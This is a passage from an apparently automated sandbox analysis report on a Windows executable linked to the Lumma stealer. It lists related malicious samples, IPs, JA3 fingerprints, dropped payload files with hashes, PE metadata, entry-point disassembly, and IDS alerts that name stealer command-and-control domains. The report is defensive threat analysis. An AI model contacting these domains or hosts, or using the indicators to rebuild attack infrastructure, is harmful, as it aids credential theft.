	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.56.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
CLOUDFLARENETUS	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
AKAMAI-ASUS	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	Message 2.eml	Get hash	malicious	Unknown	Browse	104.102.34.105
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	95.101.248.46
	Message.eml	Get hash	malicious	Unknown	Browse	184.28.90.27
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.96.1
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.102.49.254 104.21.96.1
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 104.21.96.1
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 104.21.96.1
37f463bf4616ecd445d4a1937da06e19	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.56.70
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.56.70
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.56.70
	AM983ebb5F.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	av8XPPpdBc.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70
	7uY105UTJU.exe	Get hash	malicious	GuLoader	Browse	104.21.56.70

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2889.tmp.exe_743a22cd80e3af015dc4cbfb2af65c2bed012cc_b54c7ca3_77cb44fa-d85f-41c1-81de-b172f71ce587\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0644343364140896
Encrypted:	false
SSDEEP:	192:W7IQrsj60692IjsFmFnzuiFRZ24IO8hc3:i/rsjB692IjDnzuiFRY4IO8h
MD5:	8C3DAB1A891C2FCC9A0DD0D754DC8079
SHA1:	F0854F47048E3155F413D3E1DFD074FAC4942DB8
SHA-256:	83D00931A38C7CE55B53225B556C04410A78EB3AC564B5639C23742A50CDC3CC
SHA-512:	1DCA8531BA963E6A8E5EC37F8F3601441EBD1193E6B8227983A85F5267011E0BEAA24C15B05F27A6BB1E37A090DCAC7C690353E535C05F82EA11C637B10D565C
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.3.0.9.9.8.7.3.6.5.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.3.1.0.0.7.6.4.2.7.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.c.b.4.4.f.a.-.d.8.5.f.-.4.1.c.1.-.8.1.d.e.-.b.1.7.2.f.7.1.c.e.5.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.5.1.a.2.7.6.-.5.9.6.a.-.4.f.7.c.-.9.1.b.2.-.f.c.2.c.f.5.2.2.f.5.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.8.8.9...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.0.4.-.0.0.0.1.-.0.0.1.3.-.2.8.3.c.-.e.5.0.0.f.8.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.1.f.1.6.f.e.e.0.e.a.7.4.1.3.7.0.2.3.e.8.a.b.9.2.e.b.5.0.9.3.0.0.0.0.4.2.0.7.!.0.0.0.0.0.a.0.d.7.9.5.5.d.e.a.8.5.4.3.9.1.d.4.2.7.3.5.a.b.8.a.a.c.6.5.4.1.3.b.6.2.5.0.b.!.2.8.8.9...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6302.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 11 07:11:40 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	111818
Entropy (8bit):	2.2327821825398453
Encrypted:	false
SSDEEP:	384:oDfJS8Td+7Bnv8zQA3tnDPNEuIg9thOLBhP4hdH6shuTmI1JqdRy:oDBbTd+7B7A3tnDX3hmh4ajP1J0Ry
MD5:	A999BFAE29E09B39030E80379013DDB3
SHA1:	EDB477C43F22198F618143487DBD7B8257F0D3AE
SHA-256:	1DA8969CC7BD9B27D050D313A669C87AF9D0B6863192EDD7485275C2F598D34C
SHA-512:	848F6CB6D89523CF31E680F20D8BD6A54878F3D320C0501079F7DE2A788D16CA2C86131D66267B3E19938BF5741CCF114D8FB46D15B9032558BD7C85ED4AFC37
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g........................p...............h$..........XP..........`.......8...........T............F...n..........d%..........P'..............................................................................eJ.......'......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6516.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.700488168064145
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/F6mc6YKn6AskgmfWTupDT89bF28wsf4oXm:R6lXJN6mc6Yi6ggmfWTnFJf4l
MD5:	4B6C176F40EDA03827AE3DD1EC5B2AF9
SHA1:	5105D9D4FA3130D4E3F48146366740CDF02F2D27
SHA-256:	8A198F61F4DA407A24FA3725DC1A222370C3E021561BEB0CE6249CB513D979AE
SHA-512:	7BF6830CC0B097C3813245FDC8E3ADBC3CD2749373FDE7FBE27ADB3F267F3B7A945F3990EF267EBB057C23527E98E92232DBB895C89F42D7143433D90912ABE9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6546.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.461916004516698
Encrypted:	false
SSDEEP:	48:cvIwWl8zs1Jg77aI9YLWpW8VYdPYm8M4JZTO3FKino+q8viTOFgCHid:uIjfPI7G67V5Jt8noKE2lHid
MD5:	97142C4B3914DAF87D7BFA3BE61BC6C0
SHA1:	A8D2D8F639C9D6F933AE0F2CB3F315ABE79B8445
SHA-256:	C96BEA5F65F019177DD6D3F70BEA5A5F0FEA0C9630D42C9F58F5F2240E6E57CE
SHA-512:	660AEB5AEFB3D27F1F0554CA8E15BBDAE52C252D955C23AB13EDC5F8253446944130719E7DECC2636BA3A193CF3968152E6459185FA2649160A74ED0C40D5B95
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670934" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\b0cQukXPAl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	333312
Entropy (8bit):	7.324214872542696
Encrypted:	false
SSDEEP:	6144:WbIULHOg8QOYJAAjVKuL8aC0rL0hFbE1hHYa3FFeMqVB9xPsCL7GvFKBCpCSV:Wv7OhYljVNLJRMhFbE11lXVs9FjGtEC
MD5:	1B513E6F8721E444A9364DD93630F015
SHA1:	0A0D7955DEA854391D42735AB8AAC65413B6250B
SHA-256:	9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575
SHA-512:	85394825D6BB71CA176CE8771E7A8EAEEEF3D4AB692151D896C4FB410AB32FA3B0C5307BC8F3C41E947A15DC19E9B2A024D2BAD5B30ACA80083D73EBB94BE94C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:	Filename: Mmm7GmDcR4.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(....k.(...(.k.(..L.k..Q..5.k.6.j.C.k.(..7.k.(...7.k.(...7.k.Rich6.k.................PE..L......e.................&...........^.......@....@..........................................................................+..(.......(........................................................... G..@...............\|............................text...p$.......&.................. ..`.data.......@...`...*..............@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Download File

Process:	C:\Users\user\Desktop\b0cQukXPAl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	333312
Entropy (8bit):	7.324214872542696
Encrypted:	false
SSDEEP:	6144:WbIULHOg8QOYJAAjVKuL8aC0rL0hFbE1hHYa3FFeMqVB9xPsCL7GvFKBCpCSV:Wv7OhYljVNLJRMhFbE11lXVs9FjGtEC
MD5:	1B513E6F8721E444A9364DD93630F015
SHA1:	0A0D7955DEA854391D42735AB8AAC65413B6250B
SHA-256:	9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575
SHA-512:	85394825D6BB71CA176CE8771E7A8EAEEEF3D4AB692151D896C4FB410AB32FA3B0C5307BC8F3C41E947A15DC19E9B2A024D2BAD5B30ACA80083D73EBB94BE94C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:	Filename: Mmm7GmDcR4.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(....k.(...(.k.(..L.k..Q..5.k.6.j.C.k.(..7.k.(...7.k.(...7.k.Rich6.k.................PE..L......e.................&...........^.......@....@..........................................................................+..(.......(........................................................... G..@...............\|............................text...p$.......&.................. ..`.data.......@...`...*..............@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.295987971790157
Encrypted:	false
SSDEEP:	6144:B41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+wXmBMZJh1VjE:21/YCW2AoQ0NiSXwMHrVQ
MD5:	A1B4209E220D3F3CAA174582CBA23241
SHA1:	010611FCFE1CE9C8626D3D1DA95172C8568C2BFB
SHA-256:	4C05362EC628A7EBB2ADADFA93B5E0D1FE76D28673FD54FB34EBC5FCDEEDF4D0
SHA-512:	B022BD7F6AA4E232D534E84FBF1FFFA2029A63956FAED4E3867B05CBD2400F79C707C3E29B2FEC7528BDEA1627497B47A559BCEC011A1C9D0DBB374332BE6C85
Malicious:	false
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV.P..c................................................................................................................................................................................................................................................................................................................................................D;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.476370104296252
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	b0cQukXPAl.exe
File size:	385'536 bytes
MD5:	9fc816bb0cbe07f412d1dda6feedb96f
SHA1:	a1ad3308aff286e85320d7a0ba675a8c908855c5
SHA256:	aec328fd9bcc345b1e5e9f7bc80243e9a2c1df438c41b51e09b4efe76ad58d0a
SHA512:	89844d1597e6977f06903cfde584091e55b432ecac4a1fa83a8d1ea59921deadec2404070e9436a18c9160ba92232d6e11b33ec34ed27c81ed17f2dea99ea47f
SSDEEP:	6144:jcL3JVhP0Ob7RGdkS5WmwZk+o6BD7A1xxOQXDVJggKJFmd:jc7JV1bdsdAWLCDsvxOQX7L
TLSH:	EB840213B0A2D872D8A6513598A0DBE4267FB8754774488B37AC1B3F6F702E11B7A347
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(.....k.(...(.k.(...L.k..Q..5.k.6.j.C.k.(...7.k.(...7.k.(...7.k.Rich6.k.................PE..L....E.e...

File Icon


Icon Hash:	46c7c30b0f4e0d19

Static PE Info

General

Entrypoint:	0x405eb5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65F44518 [Fri Mar 15 12:54:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aacf07d3d4ac7a5415783f64b2fa492d

Entrypoint Preview

Instruction
call 00007FF6F10CA7F4h
jmp 00007FF6F10C6F6Eh
int3
call 00007FF6F10C712Ch
xchg cl, ch
jmp 00007FF6F10C7114h
call 00007FF6F10C7123h
fxch st(0), st(1)
jmp 00007FF6F10C710Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FF6F10C7101h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FF6F10C70F6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FF6F10C70F4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FF6F10C70F7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FF6F10C7F7Fh
fstp st(0)
fld tbyte ptr [0045107Ah]
ret
fstp st(0)
or cl, cl
je 00007FF6F10C70FDh
fstp st(0)
fldpi
or ch, ch
je 00007FF6F10C70F4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FF6F10C70E9h
fchs
ret
fstp st(0)
jmp 00007FF6F10C7F55h
fstp st(0)
mov cl, ch
jmp 00007FF6F10C70F2h
call 00007FF6F10C70BEh
jmp 00007FF6F10C7F60h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, FFFFFD30h
push ebx
wait
fstcw word ptr [ebp+00000000h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f90c	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x8b28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4720	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x17c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4f1a0	0x4f200	c3cbcaa1bdcfb2a2b72556a7bc4ddcff	False	0.8988386157187994	data	7.856888213032163	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x51000	0x86e4	0x6000	69844d2ea75bde98851ef68504079664	False	0.08076985677083333	data	0.9448185238114903	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5a000	0xdb28	0x8c00	b64adb43f8b9969363f5680294aba0e4	False	0.6418247767857143	data	5.9743727152851	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x602b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x61158	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x61a00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_ICON	0x5a3c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.8121002132196162
RT_ICON	0x5b268	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.8754512635379061
RT_ICON	0x5bb10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.798963133640553
RT_ICON	0x5c1d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.713150289017341
RT_ICON	0x5c740	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.804149377593361
RT_ICON	0x5ece8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Romanian	Romania	0.8318480300187617
RT_ICON	0x5fd90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.8563829787234043
RT_STRING	0x621b0	0x63e	data	Romanian	Romania	0.4311639549436796
RT_STRING	0x627f0	0x338	data	Romanian	Romania	0.4696601941747573
RT_ACCELERATOR	0x60260	0x50	data	Romanian	Romania	0.8125
RT_GROUP_CURSOR	0x61f68	0x30	data			0.9166666666666666
RT_GROUP_ICON	0x601f8	0x68	data	Romanian	Romania	0.6826923076923077
RT_VERSION	0x61f98	0x218	data			0.5223880597014925

Imports

DLL

Import

KERNEL32.dll

InterlockedIncrement, EnumCalendarInfoW, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, LoadLibraryW, SetCommConfig, SwitchToFiber, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, GetShortPathNameA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, LoadLibraryA, InterlockedExchangeAdd, EnumDateFormatsA, SetLocaleInfoW, FindNextFileW, OpenEventW, ReadConsoleInputW, GetCurrentProcessId, OpenFileMappingA, EnumSystemLocalesW, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, CloseHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:11:14.318136+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49722	104.21.56.70	443	TCP
2025-01-11T08:11:15.156783+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49728	176.113.115.19	80	TCP
2025-01-11T08:11:17.380444+0100	2059088	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)	1	192.168.2.10	53522	1.1.1.1	53	UDP
2025-01-11T08:11:17.406109+0100	2059051	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)	1	192.168.2.10	51411	1.1.1.1	53	UDP
2025-01-11T08:11:17.425578+0100	2059041	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)	1	192.168.2.10	49857	1.1.1.1	53	UDP
